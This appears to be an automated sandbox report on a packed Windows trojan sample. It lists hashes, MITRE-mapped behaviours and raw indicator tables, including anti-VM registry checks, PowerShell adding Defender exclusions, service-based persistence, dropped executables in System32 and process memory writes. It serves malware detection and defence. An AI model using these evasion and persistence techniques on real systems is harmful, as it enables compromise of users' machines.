1c733ad7ed4f89826d675196abcc3a6133bb8f67c69d56e5fcb601ad521ff9f8

Analysis

max time kernel
300s
max time network
303s
platform
windows10-1703_x64
resource
win10-20240404-en
resource tags

arch:x64arch:x86image:win10-20240404-enlocale:en-usos:windows10-1703-x64system
submitted
20-06-2024 22:36

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

1c733ad7ed4f89826d675196abcc3a6133bb8f67c69d56e5fcb601ad521ff9f8.exe
Size

3.6MB
MD5

864d1a4e41a56c8f2e7e7eec89a47638
SHA1

1f2cb906b92a945c7346c7139c7722230005c394
SHA256

1c733ad7ed4f89826d675196abcc3a6133bb8f67c69d56e5fcb601ad521ff9f8
SHA512

547a441369636e2548c7f8f94c3972269e04d80ee5a26803cc222942b28e457be908126fb4ff6bfde2a063ea1ef74ecba2aaceb58c68fba5c4fddcea5fbd91d3
SSDEEP

98304:nroESehXGx5IkVu1f/ihp+t49Rd3iG2dEsL:s3ehXzgiSvGiv3tEj

Score

9^/10

evasion execution persistence themida trojan

Malware Config

Signatures

Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 1 IoCs
evasion

Query Registry
T1012

Virtualization/Sandbox Evasion
T1497

Processes:

da_protected.exe

description ioc process

Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ da_protected.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	da_protected.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 15 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

pid	process
652	powershell.exe
4668	powershell.exe
4116	powershell.exe
3512	powershell.exe
680	powershell.exe
652	powershell.exe
2376	powershell.exe
4356	powershell.exe
2684	powershell.exe
1756	powershell.exe
4380	powershell.exe
4848	powershell.exe
2792	powershell.exe
3588	powershell.exe
4668	powershell.exe

Creates new service(s) 2 TTPs
persistence execution

Windows Service
T1543.003

Service Execution
T1569.002
Downloads MZ/PE file

Checks BIOS information in registry 2 TTPs 2 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

da_protected.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	da_protected.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	da_protected.exe

Executes dropped EXE 12 IoCs

Processes:

da_protected.exedbosqb.exesetup.exesetup.exewinsvc.exewinsvc.exesetup.exesetup.exeWINNET.EXEWINCFG.EXEsetup.exesetup.exe

pid	process
3188	da_protected.exe
1624	dbosqb.exe
4300	setup.exe
2536	setup.exe
4728	winsvc.exe
2364	winsvc.exe
1492	setup.exe
3860	setup.exe
1952	WINNET.EXE
4948	WINCFG.EXE
3300	setup.exe
2368	setup.exe

Themida packer 3 IoCs

Detects Themida, an advanced Windows software protection system.

themida

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\da_protected.exe	themida
behavioral2/memory/3188-21-0x00000000000E0000-0x0000000000A38000-memory.dmp	themida
behavioral2/memory/3188-22-0x00000000000E0000-0x0000000000A38000-memory.dmp	themida

Checks whether UAC is enabled 1 TTPs 1 IoCs
evasion trojan

System Information Discovery
T1082

Processes:

da_protected.exe

description ioc process

Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA da_protected.exe
Power Settings 1 TTPs 5 IoCs
powercfg controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.
persistence

Power Settings
T1653

Processes:

powercfg.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exe

pid process

4284 powercfg.exe
4196 powercfg.exe
708 powercfg.exe
1236 powercfg.exe
164 powercfg.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	da_protected.exe

pid	process
4284	powercfg.exe
4196	powercfg.exe
708	powercfg.exe
1236	powercfg.exe
164	powercfg.exe

Drops file in System32 directory 64 IoCs

Processes:

WINNET.EXEpowershell.exesetup.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exewinsvc.exe

description	ioc	process
File created	C:\Windows\system32\data\netDb\rk\routerInfo-k6JCRvbs~cBBSfyYA3D1Ob~yG5VkqkMkgq4lpshrNcU=.dat	WINNET.EXE
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File created	C:\Windows\system32\data\netDb\rA\routerInfo-AW5JT3vZRXBCXyvXluRu60AHJkWP2Tr5sCc-SWDZ-y8=.dat	WINNET.EXE
File created	C:\Windows\system32\data\netDb\rR\routerInfo-RaGUK5AqqBmKfBAmhzcy5Bs3JzYntD6J~tugOaYvuS4=.dat	WINNET.EXE
File created	C:\Windows\system32\data\netDb\r7\routerInfo-7eSdmGy1TBGUb2LV0fh3u4sX~Ne-neewIfz6jXmhYKI=.dat	WINNET.EXE
File created	C:\Windows\system32\data\netDb\rm\routerInfo-mLteaFhnT7mkzqWf61fsJHmTYb8L0BUMN8lM~lUTfZQ=.dat	WINNET.EXE
File created	C:\Windows\system32\data\netDb\rS\routerInfo-SJlorqutSWpAHnvP4z5AA8015Tr~13Zf7XL7hx~mjs8=.dat	WINNET.EXE
File created	C:\Windows\system32\data\netDb\ry\routerInfo-y7-B9YV4ghj035LjY3NTx1NcdmZm2FP7M5NVkervp4w=.dat	WINNET.EXE
File created	C:\Windows\system32\data\netDb\re\routerInfo-egTAZPVm1aWJzgL7~zB3813~U8DuaRaOpAson7NjlGU=.dat	WINNET.EXE
File opened for modification	C:\Windows\System32\.co46F7.tmp	setup.exe
File created	C:\Windows\system32\data\netDb\rC\routerInfo-CtPtW0NWvxMWd5f1sUkDqvZQVEBJqTM5S~H0JT92j~M=.dat	WINNET.EXE
File created	C:\Windows\system32\data\netDb\ri\routerInfo-ipb-5Cb8vYIabziddnHHpjXgG6zjgx7NJS6rSfvmmbY=.dat	WINNET.EXE
File created	C:\Windows\system32\data\netDb\ra\routerInfo-aTGWvi9K21bidyV0TCy35fC2R9gw3kiyIc8oNl2MR88=.dat	WINNET.EXE
File created	C:\Windows\system32\data\netDb\rs\routerInfo-sjmmF6IPM6t1qhuDTSgSuCClwwkrvlu8bG2lNbLJbp8=.dat	WINNET.EXE
File created	C:\Windows\system32\data\netDb\rt\routerInfo-tX6wPA8tWLLoop-CMSvz0Yps7P8Apb6lTYfkLBXz9VI=.dat	WINNET.EXE
File created	C:\Windows\system32\data\netDb\rS\routerInfo-SYV78hQfKNxErUuJ6xiCagpFttW6i7V0duwmk7af7vc=.dat	WINNET.EXE
File created	C:\Windows\system32\data\netDb\rB\routerInfo-BR9qM4qEFtNwd9aG6UhPaKzqdMTicH6QBBaxYREBZ6U=.dat	WINNET.EXE
File created	C:\Windows\system32\data\netDb\rA\routerInfo-AJwIDnDIMLUO-DlFCXwhmvghuiFwgh8a-eMHA31K7~w=.dat	WINNET.EXE
File opened for modification	C:\Windows\system32\.co46F7.tmp	setup.exe
File created	C:\Windows\system32\data\netDb\rX\routerInfo-Xs8GN5KvrQcpzwTtCUR~PxDHBeGoLUqq6KmCChCURyk=.dat	WINNET.EXE
File created	C:\Windows\system32\data\netDb\rS\routerInfo-SvaU~XYoV5E2r3ZcKuyBI3vk2B3YdfVKEjfDNUHzIV8=.dat	WINNET.EXE
File created	C:\Windows\system32\data\netDb\rC\routerInfo-CXQ5MrP8NtFj0Dwegm9tfvPdycRarxZbtPOHFJrt1rE=.dat	WINNET.EXE
File created	C:\Windows\system32\data\netDb\rA\routerInfo-ASs3ZbebPc7AnHYlndm~GFllRdbMaXkSTQET47fErh0=.dat	WINNET.EXE
File created	C:\Windows\system32\data\netDb\rj\routerInfo-j9iaWr--EwjKS-v2wR-lorsI3nMcBLgpE1m3JrM6N88=.dat	WINNET.EXE
File created	C:\Windows\system32\data\netDb\rY\routerInfo-YMxVG753QeTd40YmwTlHpD1nmEXMRtm~cImqYa995d8=.dat	WINNET.EXE
File created	C:\Windows\system32\data\netDb\rA\routerInfo-AmVD2ocUaoNg~tFSZHm1S6w83NLxLjs8SHRniIoywc8=.dat	WINNET.EXE
File created	C:\Windows\system32\data\netDb\rS\routerInfo-SvojlN8N1QrQLmLBbUwlJQf-z49sG4Qj2n-dgZm9Gj0=.dat	WINNET.EXE
File created	C:\Windows\system32\data\netDb\rH\routerInfo-HWrLhZz8zUCqDcOBjlitrtJgYBgDOTSbY47D2RPW4uY=.dat	WINNET.EXE
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File created	C:\Windows\system32\data\netDb\rF\routerInfo-FleCeN0wpLCF3tRkFK~q4sDQrCGu5UgORxeJxhQlrhY=.dat	WINNET.EXE
File created	C:\Windows\system32\data\netDb\r5\routerInfo-5k6PcSPY4hp-DF3LpEDvnVD4HBdAOu3b-0YD7UCnWyg=.dat	WINNET.EXE
File created	C:\Windows\system32\data\netDb\rF\routerInfo-F97mvzWPsY0VU-EUl4nVgD9jdT9CxEXfIqo0HW~llZY=.dat	WINNET.EXE
File created	C:\Windows\system32\data\netDb\r~\routerInfo-~YundH0shNSScKmTVaGeZw~~gRSdu0L8RHGPQyO1Qgg=.dat	WINNET.EXE
File created	C:\Windows\system32\data\netDb\rH\routerInfo-HPSjema1hzCjPi2TxwgfCVtLSH67dwuAR0vyfD1Scng=.dat	WINNET.EXE
File created	C:\Windows\system32\data\netDb\rc\routerInfo-cOheHhvNB6wNgy5I4dTbCVFeZZTUdA1mSAkjEWsb0EM=.dat	WINNET.EXE
File created	C:\Windows\system32\data\netDb\rS\routerInfo-SvsdZC1mq6N~qG-i-QQBgzF-kPw47M5a~adsiN14uHo=.dat	WINNET.EXE
File created	C:\Windows\system32\data\netDb\rF\routerInfo-FtZ4v~DfovUEM9Sqg9Luu0R1IITco3gOQm2eYpOlaZA=.dat	WINNET.EXE
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File created	C:\Windows\system32\data\netDb\rg\routerInfo-g5xHgSjtdRCj3IpkZSiKEiuGEiMl4VwAAlRw5448xS4=.dat	WINNET.EXE
File created	C:\Windows\system32\data\netDb\rH\routerInfo-HItfJI4O5mxXGmVxU56BfBD2bIWuAW97MGLTypIkpUE=.dat	WINNET.EXE
File created	C:\Windows\system32\data\netDb\r7\routerInfo-7Bzdi-jKYeJ49Bvn~CV-mnhnMZQb2x~GEP24PixmXto=.dat	WINNET.EXE
File created	C:\Windows\system32\data\netDb\rp\routerInfo-p3zVgU6zjrs-TAa4SoCl-w9oGoPqPE4zec9JPpTTCHw=.dat	WINNET.EXE
File created	C:\Windows\system32\data\netDb\rU\routerInfo-UkSSADZ5RS-4UHJcjCMbM6jkteWC0Vm0zFfmmV9sXUo=.dat	WINNET.EXE
File opened for modification	C:\Windows\system32\winsvc.exe	setup.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File created	C:\Windows\system32\data\netDb\rS\routerInfo-StJgek1hkgFsvgnYvFq96OsF2kQJ6Q7cNz7rY6rV1Bw=.dat	WINNET.EXE
File created	C:\Windows\system32\data\netDb\rx\routerInfo-xcYtESGxAe5mU3N7OHGIoYPVUowOnX9K2ZQMEc0nUpQ=.dat	WINNET.EXE
File created	C:\Windows\system32\data\netDb\r8\routerInfo-8hTFhatykR5Ld2JqEOXOWH4aGTJLv4aLdUYbh-eSsFM=.dat	WINNET.EXE
File created	C:\Windows\system32\data\netDb\rD\routerInfo-D1O69~6T9Lz4cMPiFgYQ~7z56YKrf~gmJgKG6GBDpPs=.dat	WINNET.EXE
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File created	C:\Windows\system32\data\netDb\rA\routerInfo-AHBnPAT0R-QgBpjMoDRiAk9jblrk4R426l0QQ15UkSs=.dat	WINNET.EXE
File created	C:\Windows\system32\data\netDb\rf\routerInfo-fA2XgSkOOAVTifiFl5X2T24di41vFQ4XZm8q4p37QkE=.dat	WINNET.EXE
File created	C:\Windows\system32\data\netDb\rd\routerInfo-d4pemHGb-mCE6oXB~PEb3sGbgfXVYz5IWA8K8noGpWo=.dat	WINNET.EXE
File created	C:\Windows\system32\data\netDb\rA\routerInfo-ARLS9vFaedGAdrsxLY1N7~dqPJUb2DLnNhDRbh0gApg=.dat	WINNET.EXE
File created	C:\Windows\system32\data\netDb\rA\routerInfo-AsucOyeTt6-qrtNb9kpLsneBBdMmZ3v4bGys-uCIvf0=.dat	WINNET.EXE
File opened for modification	C:\Windows\system32\wincfg.exe	winsvc.exe
File created	C:\Windows\system32\data\netDb\rc\routerInfo-cmvN0ht6j8-YfyzGzf7zZ7rnFSlJwQvW4pXlLZjlOu0=.dat	WINNET.EXE
File created	C:\Windows\system32\data\router.info	WINNET.EXE
File created	C:\Windows\system32\data\netDb\rl\routerInfo-lRDWCL92bDfk64Zwl~23dxQYE-ws02writYH8ZDIkPI=.dat	WINNET.EXE
File created	C:\Windows\system32\data\netDb\rW\routerInfo-WvHoVc8uAW0nRV2k0ql11MztRDQ4bpNO8HX5V16va7k=.dat	WINNET.EXE
File created	C:\Windows\system32\data\netDb\rk\routerInfo-kyqwgJZV~WnPkg4MWHUAO6i4GdZ~mEDwPbxsAJcKuLw=.dat	WINNET.EXE
File created	C:\Windows\system32\data\netDb\rD\routerInfo-D0ebWCdKP52VkTyj6SR7fgD25lK~2aBb~Sjv2b4AqEw=.dat	WINNET.EXE

Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs

Processes:

da_protected.exe

pid process

3188 da_protected.exe
Launches sc.exe 4 IoCs
Sc.exe is a Windows utlilty to control services on the system.

Processes:

sc.exesc.exesc.exesc.exe

pid process

4904 sc.exe
4004 sc.exe
2592 sc.exe
4656 sc.exe

pid	process
4904	sc.exe
4004	sc.exe
2592	sc.exe
4656	sc.exe

Embeds OpenSSL 1 IoCs

Embeds OpenSSL, may be used to circumvent TLS interception.

Processes:

resource	yara_rule
C:\Windows\System32\winnet.exe	embeds_openssl

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Kills process with taskkill 12 IoCs

evasion

Processes:

taskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exe

pid	process
2760	taskkill.exe
1516	taskkill.exe
4628	taskkill.exe
4636	taskkill.exe
1668	taskkill.exe
2392	taskkill.exe
2224	taskkill.exe
512	taskkill.exe
3860	taskkill.exe
4940	taskkill.exe
2804	taskkill.exe
4828	taskkill.exe

Modifies data under HKEY_USERS 64 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

description	ioc	process
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	powershell.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exewinsvc.exe

pid	process
680	powershell.exe
680	powershell.exe
680	powershell.exe
4380	powershell.exe
4380	powershell.exe
4380	powershell.exe
4356	powershell.exe
4356	powershell.exe
4356	powershell.exe
3588	powershell.exe
3588	powershell.exe
3588	powershell.exe
652	powershell.exe
652	powershell.exe
652	powershell.exe
4668	powershell.exe
4668	powershell.exe
4668	powershell.exe
2792	powershell.exe
2792	powershell.exe
2792	powershell.exe
4848	powershell.exe
4848	powershell.exe
4848	powershell.exe
1756	powershell.exe
1756	powershell.exe
1756	powershell.exe
2684	powershell.exe
2684	powershell.exe
2684	powershell.exe
4116	powershell.exe
4116	powershell.exe
4116	powershell.exe
2376	powershell.exe
2376	powershell.exe
2376	powershell.exe
3512	powershell.exe
3512	powershell.exe
3512	powershell.exe
2364	winsvc.exe
2364	winsvc.exe
2364	winsvc.exe
2364	winsvc.exe
2364	winsvc.exe
2364	winsvc.exe
2364	winsvc.exe
2364	winsvc.exe
2364	winsvc.exe
2364	winsvc.exe
2364	winsvc.exe
2364	winsvc.exe
2364	winsvc.exe
2364	winsvc.exe
2364	winsvc.exe
2364	winsvc.exe
2364	winsvc.exe
2364	winsvc.exe
2364	winsvc.exe
2364	winsvc.exe
2364	winsvc.exe
2364	winsvc.exe
2364	winsvc.exe
2364	winsvc.exe
2364	winsvc.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

da_protected.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowercfg.exepowershell.exepowercfg.exepowershell.exepowercfg.exepowershell.exepowercfg.exepowershell.exepowercfg.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exepowershell.exepowershell.exe

description	pid	process
Token: SeDebugPrivilege	3188	da_protected.exe
Token: SeDebugPrivilege	680	powershell.exe
Token: SeDebugPrivilege	4380	powershell.exe
Token: SeDebugPrivilege	4356	powershell.exe
Token: SeDebugPrivilege	3588	powershell.exe
Token: SeDebugPrivilege	652	powershell.exe
Token: SeAssignPrimaryTokenPrivilege	652	powershell.exe
Token: SeIncreaseQuotaPrivilege	652	powershell.exe
Token: SeSecurityPrivilege	652	powershell.exe
Token: SeTakeOwnershipPrivilege	652	powershell.exe
Token: SeLoadDriverPrivilege	652	powershell.exe
Token: SeSystemtimePrivilege	652	powershell.exe
Token: SeBackupPrivilege	652	powershell.exe
Token: SeRestorePrivilege	652	powershell.exe
Token: SeShutdownPrivilege	652	powershell.exe
Token: SeSystemEnvironmentPrivilege	652	powershell.exe
Token: SeUndockPrivilege	652	powershell.exe
Token: SeManageVolumePrivilege	652	powershell.exe
Token: SeDebugPrivilege	4668	powershell.exe
Token: SeAssignPrimaryTokenPrivilege	4668	powershell.exe
Token: SeIncreaseQuotaPrivilege	4668	powershell.exe
Token: SeSecurityPrivilege	4668	powershell.exe
Token: SeTakeOwnershipPrivilege	4668	powershell.exe
Token: SeLoadDriverPrivilege	4668	powershell.exe
Token: SeSystemtimePrivilege	4668	powershell.exe
Token: SeBackupPrivilege	4668	powershell.exe
Token: SeRestorePrivilege	4668	powershell.exe
Token: SeShutdownPrivilege	4668	powershell.exe
Token: SeSystemEnvironmentPrivilege	4668	powershell.exe
Token: SeUndockPrivilege	4668	powershell.exe
Token: SeManageVolumePrivilege	4668	powershell.exe
Token: SeDebugPrivilege	2792	powershell.exe
Token: SeShutdownPrivilege	4196	powercfg.exe
Token: SeCreatePagefilePrivilege	4196	powercfg.exe
Token: SeDebugPrivilege	4848	powershell.exe
Token: SeShutdownPrivilege	708	powercfg.exe
Token: SeCreatePagefilePrivilege	708	powercfg.exe
Token: SeDebugPrivilege	1756	powershell.exe
Token: SeShutdownPrivilege	1236	powercfg.exe
Token: SeCreatePagefilePrivilege	1236	powercfg.exe
Token: SeDebugPrivilege	2684	powershell.exe
Token: SeShutdownPrivilege	164	powercfg.exe
Token: SeCreatePagefilePrivilege	164	powercfg.exe
Token: SeDebugPrivilege	4116	powershell.exe
Token: SeShutdownPrivilege	4284	powercfg.exe
Token: SeCreatePagefilePrivilege	4284	powercfg.exe
Token: SeDebugPrivilege	1668	taskkill.exe
Token: SeDebugPrivilege	2392	taskkill.exe
Token: SeDebugPrivilege	3860	taskkill.exe
Token: SeDebugPrivilege	2224	taskkill.exe
Token: SeDebugPrivilege	2376	powershell.exe
Token: SeAssignPrimaryTokenPrivilege	2376	powershell.exe
Token: SeIncreaseQuotaPrivilege	2376	powershell.exe
Token: SeSecurityPrivilege	2376	powershell.exe
Token: SeTakeOwnershipPrivilege	2376	powershell.exe
Token: SeLoadDriverPrivilege	2376	powershell.exe
Token: SeSystemtimePrivilege	2376	powershell.exe
Token: SeBackupPrivilege	2376	powershell.exe
Token: SeRestorePrivilege	2376	powershell.exe
Token: SeShutdownPrivilege	2376	powershell.exe
Token: SeSystemEnvironmentPrivilege	2376	powershell.exe
Token: SeUndockPrivilege	2376	powershell.exe
Token: SeManageVolumePrivilege	2376	powershell.exe
Token: SeDebugPrivilege	3512	powershell.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

1c733ad7ed4f89826d675196abcc3a6133bb8f67c69d56e5fcb601ad521ff9f8.exeda_protected.exedbosqb.exesetup.exesetup.exewinsvc.exepowershell.exepowershell.exepowershell.exepowershell.exewinsvc.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

description	pid	process	target process
PID 4656 wrote to memory of 3188	4656	1c733ad7ed4f89826d675196abcc3a6133bb8f67c69d56e5fcb601ad521ff9f8.exe	da_protected.exe
PID 4656 wrote to memory of 3188	4656	1c733ad7ed4f89826d675196abcc3a6133bb8f67c69d56e5fcb601ad521ff9f8.exe	da_protected.exe
PID 4656 wrote to memory of 3188	4656	1c733ad7ed4f89826d675196abcc3a6133bb8f67c69d56e5fcb601ad521ff9f8.exe	da_protected.exe
PID 3188 wrote to memory of 1624	3188	da_protected.exe	dbosqb.exe
PID 3188 wrote to memory of 1624	3188	da_protected.exe	dbosqb.exe
PID 1624 wrote to memory of 4300	1624	dbosqb.exe	setup.exe
PID 1624 wrote to memory of 4300	1624	dbosqb.exe	setup.exe
PID 4300 wrote to memory of 2536	4300	setup.exe	setup.exe
PID 4300 wrote to memory of 2536	4300	setup.exe	setup.exe
